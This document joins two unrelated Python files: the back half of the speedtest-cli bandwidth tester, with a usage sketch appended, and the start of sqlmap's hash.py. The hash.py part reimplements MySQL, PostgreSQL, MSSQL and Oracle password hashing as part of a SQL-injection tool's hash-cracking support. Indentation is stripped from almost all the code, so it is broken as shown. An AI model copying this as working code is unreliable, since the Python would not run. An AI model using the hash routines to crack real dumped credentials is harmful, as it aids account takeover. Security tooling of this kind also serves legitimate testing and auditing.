if self._share:
return self._share
download = int(round(self.download / 1000.0, 0))
ping = int(round(self.ping, 0))
upload = int(round(self.upload / 1000.0, 0))
# Build the request to send results back to speedtest.net
# We use a list instead of a dict because the API expects parameters
# in a certain order
api_data = [
"recommendedserverid=%s" % self.server["id"],
"ping=%s" % ping,
"screenresolution=",
"promo=",
"download=%s" % download,
"screendpi=",
"upload=%s" % upload,
"testmethod=http",
"hash=%s"
% md5(
("%s-%s-%s-%s" % (ping, upload, download, "297aae72")).encode()
).hexdigest(),
"touchscreen=none",
"startmode=pingselect",
"accuracy=1",
"bytesreceived=%s" % self.bytes_received,
"bytessent=%s" % self.bytes_sent,
"serverid=%s" % self.server["id"],
]
headers = {"Referer": "http://c.speedtest.net/flash/speedtest.swf"}
request = build_request(
"://www.speedtest.net/api/api.php",
data="&".join(api_data).encode(),
headers=headers,
secure=self._secure,
)
f, e = catch_request(request, opener=self._opener)
if e:
raise ShareResultsConnectFailure(e)
response = f.read()
code = f.code
f.close()
if int(code) != 200:
raise ShareResultsSubmitFailure(
"Could not submit results to " "speedtest.net"
)
qsargs = parse_qs(response.decode())
resultid = qsargs.get("resultid")
if not resultid or len(resultid) != 1:
raise ShareResultsSubmitFailure(
"Could not submit results to " "speedtest.net"
)
self._share = "http://www.speedtest.net/result/%s.png" % resultid[0]
return self._share
def dict(self):
"""Return dictionary of result data"""
return {
"download": self.download,
"upload": self.upload,
"ping": self.ping,
"server": self.server,
"timestamp": self.timestamp,
"bytes_sent": self.bytes_sent,
"bytes_received": self.bytes_received,
"share": self._share,
"client": self.client,
}
@staticmethod
def csv_header(delimiter=","):
"""Return CSV Headers"""
row = [
"Server ID",
"Sponsor",
"Server Name",
"Timestamp",
"Distance",
"Ping",
"Download",
"Upload",
"Share",
"IP Address",
]
out = StringIO()
writer = csv.writer(out, delimiter=delimiter, lineterminator="")
writer.writerow([to_utf8(v) for v in row])
return out.getvalue()
def csv(self, delimiter=","):
"""Return data in CSV format"""
data = self.dict()
out = StringIO()
writer = csv.writer(out, delimiter=delimiter, lineterminator="")
row = [
data["server"]["id"],
data["server"]["sponsor"],
data["server"]["name"],
data["timestamp"],
data["server"]["d"],
data["ping"],
data["download"],
data["upload"],
self._share or "",
self.client["ip"],
]
writer.writerow([to_utf8(v) for v in row])
return out.getvalue()
def json(self, pretty=False):
"""Return data in JSON format"""
kwargs = {}
if pretty:
kwargs.update({"indent": 4, "sort_keys": True})
return json.dumps(self.dict(), **kwargs)
class Speedtest(object):
"""Class for performing standard speedtest.net testing operations"""
def __init__(
self,
config=None,
source_address=None,
timeout=10,
secure=False,
shutdown_event=None,
):
self.config = {}
self._source_address = source_address
self._timeout = timeout
self._opener = build_opener(source_address, timeout)
self._secure = secure
if shutdown_event:
self._shutdown_event = shutdown_event
else:
self._shutdown_event = FakeShutdownEvent()
self.get_config()
if config is not None:
self.config.update(config)
self.servers = {}
self.closest = []
self._best = {}
self.results = SpeedtestResults(
client=self.config["client"],
opener=self._opener,
secure=secure,
)
@property
def best(self):
if not self._best:
self.get_best_server()
return self._best
def get_config(self):
"""Download the speedtest.net configuration and return only the data
we are interested in
"""
headers = {}
if gzip:
headers["Accept-Encoding"] = "gzip"
request = build_request(
"://www.speedtest.net/speedtest-config.php",
headers=headers,
secure=self._secure,
)
uh, e = catch_request(request, opener=self._opener)
if e:
raise ConfigRetrievalError(e)
configxml_list = []
stream = get_response_stream(uh)
while 1:
try:
configxml_list.append(stream.read(1024))
except (OSError, EOFError):
raise ConfigRetrievalError(get_exception())
if len(configxml_list[-1]) == 0:
break
stream.close()
uh.close()
if int(uh.code) != 200:
return None
configxml = "".encode().join(configxml_list)
printer("Config XML:\n%s" % configxml, debug=True)
try:
try:
root = ET.fromstring(configxml)
except ET.ParseError:
e = get_exception()
raise SpeedtestConfigError(
"Malformed speedtest.net configuration: %s" % e
)
server_config = root.find("server-config").attrib
download = root.find("download").attrib
upload = root.find("upload").attrib
# times = root.find('times').attrib
client = root.find("client").attrib
except AttributeError:
try:
root = DOM.parseString(configxml)
except ExpatError:
e = get_exception()
raise SpeedtestConfigError(
"Malformed speedtest.net configuration: %s" % e
)
server_config = get_attributes_by_tag_name(root, "server-config")
download = get_attributes_by_tag_name(root, "download")
upload = get_attributes_by_tag_name(root, "upload")
# times = get_attributes_by_tag_name(root, 'times')
client = get_attributes_by_tag_name(root, "client")
ignore_ids = server_config["ignoreids"]
ignore_servers = (
list(map(int, ignore_ids.split(","))) if ignore_ids != "" else []
)
ratio = int(upload["ratio"])
upload_max = int(upload["maxchunkcount"])
up_sizes = [32768, 65536, 131072, 262144, 524288, 1048576, 7340032]
sizes = {
"upload": up_sizes[ratio - 1 :],
"download": [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000],
}
size_count = len(sizes["upload"])
upload_count = int(math.ceil(upload_max / size_count))
counts = {"upload": upload_count, "download": int(download["threadsperurl"])}
threads = {
"upload": int(upload["threads"]),
"download": int(server_config["threadcount"]) * 2,
}
length = {
"upload": int(upload["testlength"]),
"download": int(download["testlength"]),
}
self.config.update(
{
"client": client,
"ignore_servers": ignore_servers,
"sizes": sizes,
"counts": counts,
"threads": threads,
"length": length,
"upload_max": upload_count * size_count,
}
)
try:
self.lat_lon = (float(client["lat"]), float(client["lon"]))
except ValueError:
raise SpeedtestConfigError(
"Unknown location: lat=%r lon=%r"
% (client.get("lat"), client.get("lon"))
)
printer("Config:\n%r" % self.config, debug=True)
return self.config
def get_servers(self, servers=None, exclude=None):
"""Retrieve a the list of speedtest.net servers, optionally filtered
to servers matching those specified in the ``servers`` argument
"""
if servers is None:
servers = []
if exclude is None:
exclude = []
self.servers.clear()
for server_list in (servers, exclude):
for i, s in enumerate(server_list):
try:
server_list[i] = int(s)
except ValueError:
raise InvalidServerIDType(
"%s is an invalid server type, must be int" % s
)
urls = [
"://www.speedtest.net/speedtest-servers-static.php",
"http://c.speedtest.net/speedtest-servers-static.php",
"://www.speedtest.net/speedtest-servers.php",
"http://c.speedtest.net/speedtest-servers.php",
]
headers = {}
if gzip:
headers["Accept-Encoding"] = "gzip"
errors = []
for url in urls:
try:
request = build_request(
"%s?threads=%s" % (url, self.config["threads"]["download"]),
headers=headers,
secure=self._secure,
)
uh, e = catch_request(request, opener=self._opener)
if e:
errors.append("%s" % e)
raise ServersRetrievalError()
stream = get_response_stream(uh)
serversxml_list = []
while 1:
try:
serversxml_list.append(stream.read(1024))
except (OSError, EOFError):
raise ServersRetrievalError(get_exception())
if len(serversxml_list[-1]) == 0:
break
stream.close()
uh.close()
if int(uh.code) != 200:
raise ServersRetrievalError()
serversxml = "".encode().join(serversxml_list)
printer("Servers XML:\n%s" % serversxml, debug=True)
try:
try:
try:
root = ET.fromstring(serversxml)
except ET.ParseError:
e = get_exception()
raise SpeedtestServersError(
"Malformed speedtest.net server list: %s" % e
)
elements = etree_iter(root, "server")
except AttributeError:
try:
root = DOM.parseString(serversxml)
except ExpatError:
e = get_exception()
raise SpeedtestServersError(
"Malformed speedtest.net server list: %s" % e
)
elements = root.getElementsByTagName("server")
except (SyntaxError, xml.parsers.expat.ExpatError):
raise ServersRetrievalError()
for server in elements:
try:
attrib = server.attrib
except AttributeError:
attrib = dict(list(server.attributes.items()))
if servers and int(attrib.get("id")) not in servers:
continue
if (
int(attrib.get("id")) in self.config["ignore_servers"]
or int(attrib.get("id")) in exclude
):
continue
try:
d = distance(
self.lat_lon,
(float(attrib.get("lat")), float(attrib.get("lon"))),
)
except Exception:
continue
attrib["d"] = d
try:
self.servers[d].append(attrib)
except KeyError:
self.servers[d] = [attrib]
break
except ServersRetrievalError:
continue
if (servers or exclude) and not self.servers:
raise NoMatchedServers()
return self.servers
def set_mini_server(self, server):
"""Instead of querying for a list of servers, set a link to a
speedtest mini server
"""
urlparts = urlparse(server)
name, ext = os.path.splitext(urlparts[2])
if ext:
url = os.path.dirname(server)
else:
url = server
request = build_request(url)
uh, e = catch_request(request, opener=self._opener)
if e:
raise SpeedtestMiniConnectFailure("Failed to connect to %s" % server)
else:
text = uh.read()
uh.close()
extension = re.findall('upload_?[Ee]xtension: "([^"]+)"', text.decode())
if not extension:
for ext in ["php", "asp", "aspx", "jsp"]:
try:
f = self._opener.open("%s/speedtest/upload.%s" % (url, ext))
except Exception:
pass
else:
data = f.read().strip().decode()
if (
f.code == 200
and len(data.splitlines()) == 1
and re.match("size=[0-9]", data)
):
extension = [ext]
break
if not urlparts or not extension:
raise InvalidSpeedtestMiniServer(
"Invalid Speedtest Mini Server: " "%s" % server
)
self.servers = [
{
"sponsor": "Speedtest Mini",
"name": urlparts[1],
"d": 0,
"url": "%s/speedtest/upload.%s" % (url.rstrip("/"), extension[0]),
"latency": 0,
"id": 0,
}
]
return self.servers
def get_closest_servers(self, limit=5):
"""Limit servers to the closest speedtest.net servers based on
geographic distance
"""
if not self.servers:
self.get_servers()
for d in sorted(self.servers.keys()):
for s in self.servers[d]:
self.closest.append(s)
if len(self.closest) == limit:
break
else:
continue
break
printer("Closest Servers:\n%r" % self.closest, debug=True)
return self.closest
def get_best_server(self, servers=None):
"""Perform a speedtest.net "ping" to determine which speedtest.net
server has the lowest latency
"""
if not servers:
if not self.closest:
servers = self.get_closest_servers()
servers = self.closest
if self._source_address:
source_address_tuple = (self._source_address, 0)
else:
source_address_tuple = None
user_agent = build_user_agent()
results = {}
for server in servers:
cum = []
url = os.path.dirname(server["url"])
stamp = int(timeit.time.time() * 1000)
latency_url = "%s/latency.txt?x=%s" % (url, stamp)
for i in range(0, 3):
this_latency_url = "%s.%s" % (latency_url, i)
printer("%s %s" % ("GET", this_latency_url), debug=True)
urlparts = urlparse(latency_url)
try:
if urlparts[0] == "https":
h = SpeedtestHTTPSConnection(
urlparts[1], source_address=source_address_tuple
)
else:
h = SpeedtestHTTPConnection(
urlparts[1], source_address=source_address_tuple
)
headers = {"User-Agent": user_agent}
path = "%s?%s" % (urlparts[2], urlparts[4])
start = timeit.default_timer()
h.request("GET", path, headers=headers)
r = h.getresponse()
total = timeit.default_timer() - start
except HTTP_ERRORS:
e = get_exception()
printer("ERROR: %r" % e, debug=True)
cum.append(3600)
continue
text = r.read(9)
if int(r.status) == 200 and text == "test=test".encode():
cum.append(total)
else:
cum.append(3600)
h.close()
avg = round((sum(cum) / 6) * 1000.0, 3)
results[avg] = server
try:
fastest = sorted(results.keys())[0]
except IndexError:
raise SpeedtestBestServerFailure(
"Unable to connect to servers to " "test latency."
)
best = results[fastest]
best["latency"] = fastest
self.results.ping = fastest
self.results.server = best
self._best.update(best)
printer("Best Server:\n%r" % best, debug=True)
return best
def download(self, callback=do_nothing, threads=None):
"""Test download speed against speedtest.net
A ``threads`` value of ``None`` will fall back to those dictated
by the speedtest.net configuration
"""
urls = []
for size in self.config["sizes"]["download"]:
for _ in range(0, self.config["counts"]["download"]):
urls.append(
"%s/random%sx%s.jpg"
% (os.path.dirname(self.best["url"]), size, size)
)
request_count = len(urls)
requests = []
for i, url in enumerate(urls):
requests.append(build_request(url, bump=i, secure=self._secure))
max_threads = threads or self.config["threads"]["download"]
in_flight = {"threads": 0}
def producer(q, requests, request_count):
for i, request in enumerate(requests):
thread = HTTPDownloader(
i,
request,
start,
self.config["length"]["download"],
opener=self._opener,
shutdown_event=self._shutdown_event,
)
while in_flight["threads"] >= max_threads:
timeit.time.sleep(0.001)
thread.start()
q.put(thread, True)
in_flight["threads"] += 1
callback(i, request_count, start=True)
finished = []
def consumer(q, request_count):
_is_alive = thread_is_alive
while len(finished) < request_count:
thread = q.get(True)
while _is_alive(thread):
thread.join(timeout=0.001)
in_flight["threads"] -= 1
finished.append(sum(thread.result))
callback(thread.i, request_count, end=True)
q = Queue(max_threads)
prod_thread = threading.Thread(
target=producer, args=(q, requests, request_count)
)
cons_thread = threading.Thread(target=consumer, args=(q, request_count))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
_is_alive = thread_is_alive
while _is_alive(prod_thread):
prod_thread.join(timeout=0.001)
while _is_alive(cons_thread):
cons_thread.join(timeout=0.001)
stop = timeit.default_timer()
self.results.bytes_received = sum(finished)
self.results.download = (self.results.bytes_received / (stop - start)) * 8.0
if self.results.download > 100000:
self.config["threads"]["upload"] = 8
return self.results.download
def upload(self, callback=do_nothing, pre_allocate=True, threads=None):
"""Test upload speed against speedtest.net
A ``threads`` value of ``None`` will fall back to those dictated
by the speedtest.net configuration
"""
sizes = []
for size in self.config["sizes"]["upload"]:
for _ in range(0, self.config["counts"]["upload"]):
sizes.append(size)
# request_count = len(sizes)
request_count = self.config["upload_max"]
requests = []
for i, size in enumerate(sizes):
# We set ``0`` for ``start`` and handle setting the actual
# ``start`` in ``HTTPUploader`` to get better measurements
data = HTTPUploaderData(
size,
0,
self.config["length"]["upload"],
shutdown_event=self._shutdown_event,
)
if pre_allocate:
data.pre_allocate()
headers = {"Content-length": size}
requests.append(
(
build_request(
self.best["url"], data, secure=self._secure, headers=headers
),
size,
)
)
max_threads = threads or self.config["threads"]["upload"]
in_flight = {"threads": 0}
def producer(q, requests, request_count):
for i, request in enumerate(requests[:request_count]):
thread = HTTPUploader(
i,
request[0],
start,
request[1],
self.config["length"]["upload"],
opener=self._opener,
shutdown_event=self._shutdown_event,
)
while in_flight["threads"] >= max_threads:
timeit.time.sleep(0.001)
thread.start()
q.put(thread, True)
in_flight["threads"] += 1
callback(i, request_count, start=True)
finished = []
def consumer(q, request_count):
_is_alive = thread_is_alive
while len(finished) < request_count:
thread = q.get(True)
while _is_alive(thread):
thread.join(timeout=0.001)
in_flight["threads"] -= 1
finished.append(thread.result)
callback(thread.i, request_count, end=True)
q = Queue(threads or self.config["threads"]["upload"])
prod_thread = threading.Thread(
target=producer, args=(q, requests, request_count)
)
cons_thread = threading.Thread(target=consumer, args=(q, request_count))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
_is_alive = thread_is_alive
while _is_alive(prod_thread):
prod_thread.join(timeout=0.1)
while _is_alive(cons_thread):
cons_thread.join(timeout=0.1)
stop = timeit.default_timer()
self.results.bytes_sent = sum(finished)
self.results.upload = (self.results.bytes_sent / (stop - start)) * 8.0
return self.results.upload
def ctrl_c(shutdown_event):
"""Catch Ctrl-C key sequence and set a SHUTDOWN_EVENT for our threaded
operations
"""
def inner(signum, frame):
shutdown_event.set()
printer("\nCancelling...", error=True)
sys.exit(0)
return inner
def version():
"""Print the version"""
printer("speedtest-cli %s" % __version__)
printer("Python %s" % sys.version.replace("\n", ""))
sys.exit(0)
def csv_header(delimiter=","):
"""Print the CSV Headers"""
printer(SpeedtestResults.csv_header(delimiter=delimiter))
sys.exit(0)
def parse_args():
"""Function to handle building and parsing of command line arguments"""
description = (
"Command line interface for testing internet bandwidth using "
"speedtest.net.\n"
"------------------------------------------------------------"
"--------------\n"
"https://github.com/sivel/speedtest-cli"
)
parser = ArgParser(description=description)
# Give optparse.OptionParser an `add_argument` method for
# compatibility with argparse.ArgumentParser
try:
parser.add_argument = parser.add_option
except AttributeError:
pass
parser.add_argument(
"--no-download",
dest="download",
default=True,
action="store_const",
const=False,
help="Do not perform download test",
)
parser.add_argument(
"--no-upload",
dest="upload",
default=True,
action="store_const",
const=False,
help="Do not perform upload test",
)
parser.add_argument(
"--single",
default=False,
action="store_true",
help="Only use a single connection instead of "
"multiple. This simulates a typical file "
"transfer.",
)
parser.add_argument(
"--bytes",
dest="units",
action="store_const",
const=("byte", 8),
default=("bit", 1),
help="Display values in bytes instead of bits. Does "
"not affect the image generated by --share, nor "
"output from --json or --csv",
)
parser.add_argument(
"--share",
action="store_true",
help="Generate and provide a URL to the speedtest.net "
"share results image, not displayed with --csv",
)
parser.add_argument(
"--simple",
action="store_true",
default=False,
help="Suppress verbose output, only show basic " "information",
)
parser.add_argument(
"--csv",
action="store_true",
default=False,
help="Suppress verbose output, only show basic "
"information in CSV format. Speeds listed in "
"bit/s and not affected by --bytes",
)
parser.add_argument(
"--csv-delimiter",
default=",",
type=PARSER_TYPE_STR,
help="Single character delimiter to use in CSV " 'output. Default ","',
)
parser.add_argument(
"--csv-header", action="store_true", default=False, help="Print CSV headers"
)
parser.add_argument(
"--json",
action="store_true",
default=False,
help="Suppress verbose output, only show basic "
"information in JSON format. Speeds listed in "
"bit/s and not affected by --bytes",
)
parser.add_argument(
"--list",
action="store_true",
help="Display a list of speedtest.net servers " "sorted by distance",
)
parser.add_argument(
"--server",
type=PARSER_TYPE_INT,
action="append",
help="Specify a server ID to test against. Can be " "supplied multiple times",
)
parser.add_argument(
"--exclude",
type=PARSER_TYPE_INT,
action="append",
help="Exclude a server from selection. Can be " "supplied multiple times",
)
parser.add_argument("--mini", help="URL of the Speedtest Mini server")
parser.add_argument("--source", help="Source IP address to bind to")
parser.add_argument(
"--timeout",
default=10,
type=PARSER_TYPE_FLOAT,
help="HTTP timeout in seconds. Default 10",
)
parser.add_argument(
"--secure",
action="store_true",
help="Use HTTPS instead of HTTP when communicating "
"with speedtest.net operated servers",
)
parser.add_argument(
"--no-pre-allocate",
dest="pre_allocate",
action="store_const",
default=True,
const=False,
help="Do not pre allocate upload data. Pre allocation "
"is enabled by default to improve upload "
"performance. To support systems with "
"insufficient memory, use this option to avoid a "
"MemoryError",
)
parser.add_argument(
"--version", action="store_true", help="Show the version number and exit"
)
parser.add_argument(
"--debug", action="store_true", help=ARG_SUPPRESS, default=ARG_SUPPRESS
)
options = parser.parse_args()
if isinstance(options, tuple):
args = options[0]
else:
args = options
return args
def validate_optional_args(args):
"""Check if an argument was provided that depends on a module that may
not be part of the Python standard library.
If such an argument is supplied, and the module does not exist, exit
with an error stating which module is missing.
"""
optional_args = {
"json": ("json/simplejson python module", json),
"secure": ("SSL support", HTTPSConnection),
}
for arg, info in optional_args.items():
if getattr(args, arg, False) and info[1] is None:
raise SystemExit(
"%s is not installed. --%s is " "unavailable" % (info[0], arg)
)
def printer(string, quiet=False, debug=False, error=False, **kwargs):
"""Helper function print a string with various features"""
if debug and not DEBUG:
return
if debug:
if sys.stdout.isatty():
out = "\033[1;30mDEBUG: %s\033[0m" % string
else:
out = "DEBUG: %s" % string
else:
out = string
if error:
kwargs["file"] = sys.stderr
if not quiet:
utils.print(out, **kwargs)
def shell():
"""Run the full speedtest.net test"""
global DEBUG
shutdown_event = threading.Event()
signal.signal(signal.SIGINT, ctrl_c(shutdown_event))
args = parse_args()
# Print the version and exit
if args.version:
version()
if not args.download and not args.upload:
raise SpeedtestCLIError("Cannot supply both --no-download and " "--no-upload")
if len(args.csv_delimiter) != 1:
raise SpeedtestCLIError("--csv-delimiter must be a single character")
if args.csv_header:
csv_header(args.csv_delimiter)
validate_optional_args(args)
debug = getattr(args, "debug", False)
if debug == "SUPPRESSHELP":
debug = False
if debug:
DEBUG = True
if args.simple or args.csv or args.json:
quiet = True
else:
quiet = False
if args.csv or args.json:
machine_format = True
else:
machine_format = False
# Don't set a callback if we are running quietly
if quiet or debug:
callback = do_nothing
else:
callback = print_dots(shutdown_event)
printer("Retrieving speedtest.net configuration...", quiet)
try:
speedtest = Speedtest(
source_address=args.source, timeout=args.timeout, secure=args.secure
)
except (ConfigRetrievalError,) + HTTP_ERRORS:
printer("Cannot retrieve speedtest configuration", error=True)
raise SpeedtestCLIError(get_exception())
if args.list:
try:
speedtest.get_servers()
except (ServersRetrievalError,) + HTTP_ERRORS:
printer("Cannot retrieve speedtest server list", error=True)
raise SpeedtestCLIError(get_exception())
for _, servers in sorted(speedtest.servers.items()):
for server in servers:
line = (
"%(id)5s) %(sponsor)s (%(name)s, %(country)s) "
"[%(d)0.2f km]" % server
)
try:
printer(line)
except IOError:
e = get_exception()
if e.errno != errno.EPIPE:
raise
sys.exit(0)
printer("Testing from %(isp)s (%(ip)s)..." % speedtest.config["client"], quiet)
if not args.mini:
printer("Retrieving speedtest.net server list...", quiet)
try:
speedtest.get_servers(servers=args.server, exclude=args.exclude)
except NoMatchedServers:
raise SpeedtestCLIError(
"No matched servers: %s" % ", ".join("%s" % s for s in args.server)
)
except (ServersRetrievalError,) + HTTP_ERRORS:
printer("Cannot retrieve speedtest server list", error=True)
raise SpeedtestCLIError(get_exception())
except InvalidServerIDType:
raise SpeedtestCLIError(
"%s is an invalid server type, must "
"be an int" % ", ".join("%s" % s for s in args.server)
)
if args.server and len(args.server) == 1:
printer("Retrieving information for the selected server...", quiet)
else:
printer("Selecting best server based on ping...", quiet)
speedtest.get_best_server()
elif args.mini:
speedtest.get_best_server(speedtest.set_mini_server(args.mini))
results = speedtest.results
printer(
"Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: "
"%(latency)s ms" % results.server,
quiet,
)
if args.download:
printer("Testing download speed", quiet, end=("", "\n")[bool(debug)])
speedtest.download(callback=callback, threads=(None, 1)[args.single])
printer(
"Download: %0.2f M%s/s"
% ((results.download / 1000.0 / 1000.0) / args.units[1], args.units[0]),
quiet,
)
else:
printer("Skipping download test", quiet)
if args.upload:
printer("Testing upload speed", quiet, end=("", "\n")[bool(debug)])
speedtest.upload(
callback=callback,
pre_allocate=args.pre_allocate,
threads=(None, 1)[args.single],
)
printer(
"Upload: %0.2f M%s/s"
% ((results.upload / 1000.0 / 1000.0) / args.units[1], args.units[0]),
quiet,
)
else:
printer("Skipping upload test", quiet)
printer("Results:\n%r" % results.dict(), debug=True)
if not args.simple and args.share:
results.share()
if args.simple:
printer(
"Ping: %s ms\nDownload: %0.2f M%s/s\nUpload: %0.2f M%s/s"
% (
results.ping,
(results.download / 1000.0 / 1000.0) / args.units[1],
args.units[0],
(results.upload / 1000.0 / 1000.0) / args.units[1],
args.units[0],
)
)
elif args.csv:
printer(results.csv(delimiter=args.csv_delimiter))
elif args.json:
printer(results.json())
if args.share and not machine_format:
printer("Share results: %s" % results.share())
def main():
try:
shell()
except KeyboardInterrupt:
printer("\nCancelling...", error=True)
except (SpeedtestException, SystemExit):
e = get_exception()
# Ignore a successful exit, or argparse exit
if getattr(e, "code", 1) not in (0, 2):
msg = "%s" % e
if not msg:
msg = "%r" % e
raise SystemExit("ERROR: %s" % msg)
if __name__ == "__main__":
main()
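# Minimal programmatic usage sketch (illustrative, not part of the original
# module): it mirrors the flow of shell() above using only methods defined in
# this file, without the CLI argument handling.
def _example_programmatic_run():
    st = Speedtest(secure=True)  # fetch speedtest.net configuration over HTTPS
    st.get_servers()             # retrieve the public server list
    st.get_best_server()         # pick the lowest-latency server
    st.download()                # download speed, in bits per second
    st.upload()                  # upload speed, in bits per second
    return st.results.dict()     # same payload the CLI serializes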
|
hash.py
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
try:
from crypt import crypt
except ImportError:
from thirdparty.fcrypt.fcrypt import crypt
_multiprocessing = None
try:
import multiprocessing
# problems on FreeBSD (Reference: http://www.eggheadcafe.com/microsoft/Python/35880259/multiprocessing-on-freebsd.aspx)
_ = multiprocessing.Queue()
except (ImportError, OSError):
pass
else:
try:
if multiprocessing.cpu_count() > 1:
_multiprocessing = multiprocessing
except NotImplementedError:
pass
import gc
import os
import re
import tempfile
import time
import zipfile
from hashlib import md5
from hashlib import sha1
from hashlib import sha224
from hashlib import sha384
from hashlib import sha512
from Queue import Queue
from lib.core.common import Backend
from lib.core.common import checkFile
from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout
from lib.core.common import getFileItems
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import normalizeUnicode
from lib.core.common import paths
from lib.core.common import readInput
from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage
from lib.core.convert import hexdecode
from lib.core.convert import hexencode
from lib.core.convert import utf8encode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import HASH
from lib.core.enums import MKSTEMP_PREFIX
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import COMMON_PASSWORD_SUFFIXES
from lib.core.settings import COMMON_USER_COLUMNS
from lib.core.settings import DUMMY_USER_PREFIX
from lib.core.settings import HASH_MOD_ITEM_DISPLAY
from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD
from lib.core.settings import IS_WIN
from lib.core.settings import ITOA64
from lib.core.settings import NULL
from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import ROTATING_CHARS
from lib.core.wordlist import Wordlist
from thirdparty.colorama.initialise import init as coloramainit
from thirdparty.pydes.pyDes import des
from thirdparty.pydes.pyDes import CBC
def mysql_passwd(password, uppercase=True):
"""
Reference(s):
http://csl.sublevel3.org/mysql-password-function/
>>> mysql_passwd(password='testpass', uppercase=True)
'*00E247AC5F9AF26AE0194B41E1E769DEE1429A29'
"""
retVal = "*%s" % sha1(sha1(password).digest()).hexdigest()
return retVal.upper() if uppercase else retVal.lower()
def mysql_old_passwd(password, uppercase=True): # prior to version '4.1'
"""
Reference(s):
http://www.sfr-fresh.com/unix/privat/tpop3d-1.5.5.tar.gz:a/tpop3d-1.5.5/password.c
http://voidnetwork.org/5ynL0rd/darkc0de/python_script/darkMySQLi.html
>>> mysql_old_passwd(password='testpass', uppercase=True)
'7DCDA0D57290B453'
"""
a, b, c = 1345345333, 7, 0x12345671
for d in password:
if d == ' ' or d == '\t':
continue
e = ord(d)
a ^= (((a & 63) + b) * e) + (a << 8)
c += (c << 8) ^ a
b += e
retVal = "%08lx%08lx" % (a & ((1 << 31) - 1), c & ((1 << 31) - 1))
return retVal.upper() if uppercase else retVal.lower()
def postgres_passwd(password, username, uppercase=False):
"""
Reference(s):
http://pentestmonkey.net/blog/cracking-postgres-hashes/
>>> postgres_passwd(password='testpass', username='testuser', uppercase=False)
'md599e5ea7a6f7c3269995cba3927fd0093'
"""
if isinstance(username, unicode):
username = unicode.encode(username, UNICODE_ENCODING)
if isinstance(password, unicode):
password = unicode.encode(password, UNICODE_ENCODING)
retVal = "md5%s" % md5(password + username).hexdigest()
return retVal.upper() if uppercase else retVal.lower()
def mssql_passwd(password, salt, uppercase=False):
"""
Reference(s):
http://www.leidecker.info/projects/phrasendrescher/mssql.c
https://www.evilfingers.com/tools/GSAuditor.php
>>> mssql_passwd(password='testpass', salt='4086ceb6', uppercase=False)
'0x01004086ceb60c90646a8ab9889fe3ed8e5c150b5460ece8425a'
"""
binsalt = hexdecode(salt)
unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password))
retVal = "0100%s%s" % (salt, sha1(unistr + binsalt).hexdigest())
return "0x%s" % (retVal.upper() if uppercase else retVal.lower())
def mssql_old_passwd(password, salt, uppercase=True): # prior to version '2005'
"""
Reference(s):
www.exploit-db.com/download_pdf/15537/
http://www.leidecker.info/projects/phrasendrescher/mssql.c
https://www.evilfingers.com/tools/GSAuditor.php
>>> mssql_old_passwd(password='testpass', salt='4086ceb6', uppercase=True)
'0x01004086CEB60C90646A8AB9889FE3ED8E5C150B5460ECE8425AC7BB7255C0C81D79AA5D0E93D4BB077FB9A51DA0'
"""
binsalt = hexdecode(salt)
unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password))
retVal = "0100%s%s%s" % (salt, sha1(unistr + binsalt).hexdigest(), sha1(unistr.upper() + binsalt).hexdigest())
return "0x%s" % (retVal.upper() if uppercase else retVal.lower())
def mssql_new_passwd(password, salt, uppercase=False):
"""
Reference(s):
http://hashcat.net/forum/thread-1474.html
>>> mssql_new_passwd(password='testpass', salt='4086ceb6', uppercase=False)
'0x02004086ceb6eb051cdbc5bdae68ffc66c918d4977e592f6bdfc2b444a7214f71fa31c35902c5b7ae773ed5f4c50676d329120ace32ee6bc81c24f70711eb0fc6400e85ebf25'
"""
binsalt = hexdecode(salt)
unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password))
retVal = "0200%s%s" % (salt, sha512(unistr + binsalt).hexdigest())
return "0x%s" % (retVal.upper() if uppercase else retVal.lower())
def oracle_passwd(password, salt, uppercase=True):
"""
Reference(s):
https://www.evilfingers.com/tools/GSAuditor.php
http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/
http://seclists.org/bugtraq/2007/Sep/304
>>> oracle_passwd(password='SHAlala', salt='1B7B5F82B7235E9E182C', uppercase=True)
'S:2BFCFDF5895014EE9BB2B9BA067B01E0389BB5711B7B5F82B7235E9E182C'
"""
binsalt = hexdecode(salt)
retVal = "s:%s%s" % (sha1(utf8encode(password) + binsalt).hexdigest(), salt)
return retVal.upper() if uppercase else retVal.lower()
def oracle_old_passwd(password, username, uppercase=True): # prior to version '11g'
"""
Reference(s):
http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/
>>> oracle_old_passwd(password='tiger', username='scott', uppercase=True)
'F894844C34402B67'
"""
IV, pad = "\0" * 8, "\0"
if isinstance(username, unicode):
username = unicode.encode(username, UNICODE_ENCODING)
if isinstance(password, unicode):
password = unicode.encode(password, UNICODE_ENCODING)
unistr = "".join("\0%s" % c for c in (username + password).upper())
cipher = des(hexdecode("0123456789ABCDEF"), CBC, IV, pad)
encrypted = cipher.encrypt(unistr)
cipher = des(encrypted[-8:], CBC, IV, pad)
encrypted = cipher.encrypt(unistr)
retVal = hexencode(encrypted[-8:])
return retVal.upper() if uppercase else retVal.lower()
def md5_generic_passwd(password, uppercase=False):
"""
>>> md5_generic_passwd(password='testpass', uppercase=False)
'179ad45c6ce2cb97cf1029e212046e81'
"""
retVal = md5(password).hexdigest()
return retVal.upper() if uppercase else retVal.lower()
